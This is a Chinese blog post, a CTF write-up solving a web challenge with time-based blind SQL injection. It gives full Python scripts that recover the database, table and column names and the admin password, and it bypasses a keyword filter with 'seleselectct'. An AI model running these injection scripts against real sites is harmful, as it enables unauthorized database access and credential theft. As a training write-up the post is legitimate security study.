CTF-Web30(延时盲注-难度大)

最新推荐文章于 2023-10-14 23:42:55 发布
最新推荐文章于 2023-10-14 23:42:55 发布
阅读量773 收藏 4
点赞数
分类专栏: CTF-Web
原文链接:www.henduocankao.com
版权
本文详细讲述了作者通过延时盲注和时间攻击,破解数据库名、表名和字段名的过程,包括使用Python脚本进行爆破和SQL注入技术的应用。重点介绍了如何利用burpfuzz绕过过滤,并最终获取到'admin'表的'password'字段内容。
摘要由CSDN通过智能技术生成

 30. 看起来有点难

分析:

一种方法直接使用工具Sqlmap直接跑出,username和password,然后登陆得到flag.

这里我们讲解另一种方法:延时盲注

测试?admin=1&pass=1&action=login报错,无法连接到数据库

测试?admin=admin'&pass=admin&action=login,报错,密码错误

这或许说明,admin=admin只要知道密码就行了。
这里本想直接用爆破,但是听说密码不是那种弱口令,或者字典的,就停了。。

还是回归sql注入。
注入点应该还是admin字段,测试一下过滤,试了一下?admin=admin' union select 1,2,3 --+&pass=admin&action=login

弹窗警告了!然后过滤了select,剩下的burp fuzz
过滤字符

空格 select

双写大小写绕不过去,而且并没有报错信息

http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin%27exp(~0)%20--+%20&pass=admin&action=loginadmin'exp(~0) --

测试?admin=admin' and sleep(5) --+发现延时了。

于是只能使用时间盲注。

开始写python3脚本

爆库名

 1 import requests
 2 import string
 3 
 4 gress=string.ascii_lowercase+string.ascii_uppercase+string.punctuation+string.digits
 5 databaseName=''
 6 
 7 for i in range(1, 13):   #假设库名长度为12
 8     for playload in gress:
 9 
10         url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr(database(),%s,1)='%s') then sleep(10) else 1 end or '1'='0" %(i,playload)
11         #key={'pass':'','action':'login'}
12         try:
13             print("正在测试第%d个字符是否为'%s'"%(i,playload))
14             r = requests.get(url,timeout=4)
15         except:
16             suo=0
17             databaseName+=playload
18             print("数据库名为是%s"%databaseName)
19             break
20 
21 print(databaseName)

库名是test

 然后开始爆表名

 1 import requests
 2 import string
 3 
 4 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
 5 str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
 6 tableName=[]
 7 for i in range(0,5):   #假设web4中有五个表
 8     Name=''
 9     flag2=0
10     for col in range(1,11):#假设每个表的最大长度不超过10
11         flag=0
12         for payload in str:
13             url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct table_name from information_schema.tables where table_schema='test' limit 1 offset %d),%d,1)='%s') then sleep(5) else 1 end or '1'='0" %(i,col,payload)
14             try:
15                 print(url)
16                 r = requests.get(url, timeout=4)
17             except:
18                 flag=1
19                 flag2=1
20                 Name += payload
21                 print("第%s个表为是%s" % (i+1,Name))
22                 break
23         #tableName.append(Name)
24         if flag==0:
25             break
26     if(flag2==0):
27         break
28     tableName.append(Name)
29 
30 for a in range(len(tableName)):
31     print(tableName[a])

就一张表,表名为admin

爆字段

 1 import requests
 2 import string
 3 
 4 url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
 5 str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
 6 columnName=[]
 7 for i in range(0,5):
 8     Name=''
 9     flag2=0
10     for col in range(1,11):#假设每个列名的最大长度不超过10
11         flag=0
12         for payload in str:
13             url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct column_name from information_schema.columns where table_name='admin' limit 1 offset %d),%d,1)='%s') then sleep(5) else 1 end or '1'='0" % (i, col, payload)
14             try:
15                 print(url)
16                 r = requests.get(url, timeout=4)
17             except:
18                 flag=1
19                 flag2=1
20                 Name += payload
21                 print("第%s个字段为是%s" % (i+1,Name))
22                 break
23         if flag==0:
24             break
25     if(flag2==0):
26         break
27     columnName.append(Name)
28 
29 for a in range(len(columnName)):
30     print(columnName[a])

爆出字段内容

 1 import requests
 2 import string
 3 
 4 gress=string.ascii_lowercase+string.ascii_uppercase+string.punctuation+string.digits
 5 databaseName=''
 6 
 7 for i in range(1, 16):   #假设库名长度为15
 8     for playload in gress:
 9 
10         url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin' and case when(substr((seleselectct password from admin),%d,1)='%s') then sleep(5) else 1 end or '1'='0" %(i,playload)
11 
12         try:
13             print("正在测试第%d个字符是否为'%s'"%(i,playload))
14             r = requests.get(url,timeout=4)
15         except:
16             suo=0
17             databaseName+=playload
18             print("内容为是%s"%databaseName)
19             break
20 
21 print(databaseName)

密码就是:idnuenna

提供其他脚本参考:

1.速度会很慢:

#-*- coding:utf8 -*-
import requests
import re
tname = ''
cname = ''
password = ''
flag =''
 
url = 'http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1'
payload = '%27%20or%20length((Select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%20database()))={m}%20--%20&pass=&action=login'
 
for i in range(1,10):
	payload1 = payload.format(m=i)
	url1 = requests.get(url+payload1)
	if '</center></div>' in url1.content:
		print 'length:',i
		break
payload2 = '%27 or ascii(substr(({x}),{y},1))={z}-- &pass=1&action=login'
print u'客观稍等......'
for k in range(1,i+1):
	for d in range(60,124):
		payload3 = payload2.format(x='Select group_concat(table_name)from information_schema.tables where table_schema = database()',y=k,z=d)
		url2 = requests.get(url+payload3)
		if '</center></div>' in url2.content:
			tname += chr(d)
			break
print 'table_name:',tname
 
 
pp = '%27 or ascii(substr((Select group_concat(column_name)from information_schema.columns where table_name ={s}),{s1},1))={s2}-- &pass=1&action=login'
print u'要不坐下来喝杯茶吧。'
for k1 in range(1,18):
	for k2 in range(0,124):
		pp1 = pp.format(s="'%s'"%tname,s1=k1,s2=k2)
		url3 = requests.get(url+pp1)
		if '</center></div>' in url3.content:
			cname += chr(k2)
			break
print cname
 
print u'就要完成了,loading......'
cn = raw_input('column_name:')
p1 = '%27 or ascii(substr((Select {cnn} from {tnn}),{nn},1))={mm}-- &pass=1&action=login'
for kk in range(1,9):
	for kk1 in range(0,124):
		p2 = p1.format(cnn='%s'%cn,tnn='%s'%tname,nn=kk,mm=kk1)
		uu = requests.get(url+p2)
		if '</center></div>' in uu.content:
			password += chr(kk1)
			break
 
url4 = 'http://ctf5.shiyanbar.com/basic/inject/index.php?admin={admin}&pass={passwd}&action=login'
url5 = url4.format(admin='admin',passwd='%s'%password)
u1 = requests.get(url5)
if 'KEY' in u1.content:
	bb = re.findall('KEY :(.*?)</center>',u1.text)
	print u'[+]....恭喜喽!....[+]'
	print 'flag',bb


2.如果我们知道其中一个字段为password,一般mysql数据库都会有这个字段:

#-*-coding:utf-8-*-
import requests  
import time  
  
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}*'  #不区分大小写的  
  
flag = ""  
key=0  
print("Start")  
for i in range(1,50):  
    if key == 1:  
        break  
    for payload in payloads:  
        starttime = time.time()#记录当前时间  
        headers = {"Host": "ctf5.shiyanbar.com",  
                   "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",  
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",  
                   "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",  
                   "Accept-Encoding": "gzip, deflate",  
                   "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",  
                   "Connection": "keep-alive",  
                   }  
        url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(substr(password,%s,1)='%s') then sleep(10) else sleep(0) end and ''='&pass=&action=login" %(i,payload)#数据库  
        res = requests.get(url, headers=headers)  
        if time.time() - starttime > 10:  
            flag += payload  
            print("pwd is:%s"%flag)  
            break  
        else:  
            if payload == '*':  
                key = 1  
                break  
print('[Finally] current pwd is %s'% flag)

 

参考链接:

https://blog.csdn.net/dongyanwen6036/article/details/77840791?utm_source=blogxgwz2

https://blog.csdn.net/weixin_30436891/article/details/95465047

https://my.oschina.net/u/4360182/blog/3279600
链接:https://www.imooc.com/article/259198

  

红烧兔纸
关注
专栏目录
SQL注入--盲注(布尔与延时)
weixin_44940180的博客
08-07 1225
布尔与延时盲注的区别 首先,使用二者的前提是,在参数错误的情况下(例如:1’)不会返回报错信息 布尔盲注:在正确与错误参数下,页面返回的信息有所不同 延时盲注:不论输入正确或错误参数,页面没有明显区别 时间盲注更像是布尔盲注的升级,布尔盲注的时候比较直观的变化 所以这个时候基于时间的盲注,也就是在基于布尔的盲注上结合if判断和sleep()或benchmark()函数来得到一个时间上的变换延迟的参照,也就可以让我们进行一些判断 盲注常使用的函数 length():确定字符长度 ascii():确定某个字
Bugku CTF web30(Web)
ChaoYue_miku的博客
03-13 364
0、打开网页,查看PHP源码 题目描述:txt???? <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> ...
时间延迟盲注详解
weixin_30729609的博客
09-29 915
0x00 延迟注入定义 延迟注入,是一种盲注的手法,提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注.SQLMAP、穿山甲、胡萝卜等主流注入工具可能检测不出,只能手工检测,利用脚本程序跑出结果。 0x01 延迟注入的函数 sleep() ...
延时盲注(一)
qq_45300786的博客
07-13 1187
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化 " and 1=2 %23 然后使用延时注入, " and sleep(5) %23 1,判断当前库名的长度 这里我们用到了数据库里的if语句 有点类似于三元运算,条件成立,就执行第二个,条件不成立就执行第三个。 " and if(length(database())=12,
延迟盲注
Papiofelix's Area
09-03 263
Blind SQL Injection SQL盲注的利用方法及总结:http://www.myhack58.com/Article/html/3/7/2011/32223_2.htm 简单介绍Mysql和Mssql的延迟盲注 Mysql benchmark 的使用:http://blog.csdn.net/veverrr/article/details/6312461 在延迟盲注
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
延时盲注(CVE-2022-0948)
热门推荐
Battery的博客
10-14 11万+
WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞。
CTF-Web7(涉及盲注脚本)
→_→
08-21 1221
7.who are you? 进入这个页面,发现他获取了我的ip,首先想到的就是user agent注入,用updatexml试一下,什么错的没有报...看来这个思路不行(注:user agent注入和updatexml不会的参考Sqli-labs之Less-18和Less-19) 百度了才知道这是一道伪造IP的题,总结下,伪造IP的HTTP头都有这些: X-Forwarded-For Client-IP x-remote-IP x-originating-IP x-re...
CTFHub技能树笔记之WEB-SQL:时间盲注
weixin_48799157的博客
04-08 4005
小白一个,如有错误请指正 这里使用两种解法 1.python脚本 2.sqlmap 一、需要用到的函数: length() //返回字符串的长度 ascii() //返回一个字符的ascii码值 substr(字符串,开始位置,截取数量)//截取字符串 sleep() //时间注入的核心函数 if(判断语句,语句一,语句二) ...
学习延时盲注看这一篇就够了
qq_61553520的博客
04-17 231
延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据应用场景:当布尔盲注失效的情况下,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入。在实际测试中禁止使用延时盲注,因为会影响厂商的实际业务运行,当年某人注入了一个sleep(10)后,就被请去喝茶了,建议不要轻易使用延时盲注。时间盲注适合在布尔注入都失效的情况,结合sleep,if(,,)基于数据包返回时间测试的方法。
时间盲注(延迟注入
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
CTF技能树笔记之WEB-SQL注入:布尔盲注
weixin_48799157的博客
04-02 2775
小白一个,如有错误请指正! 一、布尔注入 盲注有三种解法: 1.sqlmap 2.python脚本 3.手注 这里我就用sqlmap和脚本(手注真的会累死人的有木有?) 解法一:sqlmap 我们只需要按步骤来就可以了 sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbs sqlmap -u http://challenge-00cfdd6ec4589579.sandbo
CTF-web-web3
三天不打上房揭瓦的博客
08-25 474
前言:小编也是现学现卖,方便自己记忆,写的不好的地方还请包涵,也欢迎各位大佬多多批评指正 网址:web-web3 1.进入网址可以看到一个弹框,先阻止弹框。 2.右键查看源代码,发现是js代码,alert函数的弹框。 3.划到最下面,发现一串 HTML 编码 4.打开bp 或者其它编码软件进行解码。我这里使用bp进行解码。 将后面三个l 去掉,得到flag为:KEY{J2sa42ahJK-HS11} ...
webug--延时注入
gclome的博客
05-13 1049
延时注入介绍 对于基于时间的盲注,通过构造真or假判断条件的sql语句,且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求,观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。 延时注入我们一般不能从页面直接获取数据库信息,所用知识与第二关基本相同 if(exp,1,sleep(5))如果exp为真,返回1,否则返回sleep(5
CTF-WEB入门指南:技能、资源与漏洞解析
"这篇文档是针对想要入门CTF(Capture The Flag)竞赛,特别是Web安全领域的初学者。文档强调了参与CTF的目的,无论是娱乐还是为未来的职业发展做准备,并提醒学习者要有毅力和牺牲休息时间的决心。内容涵盖了需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值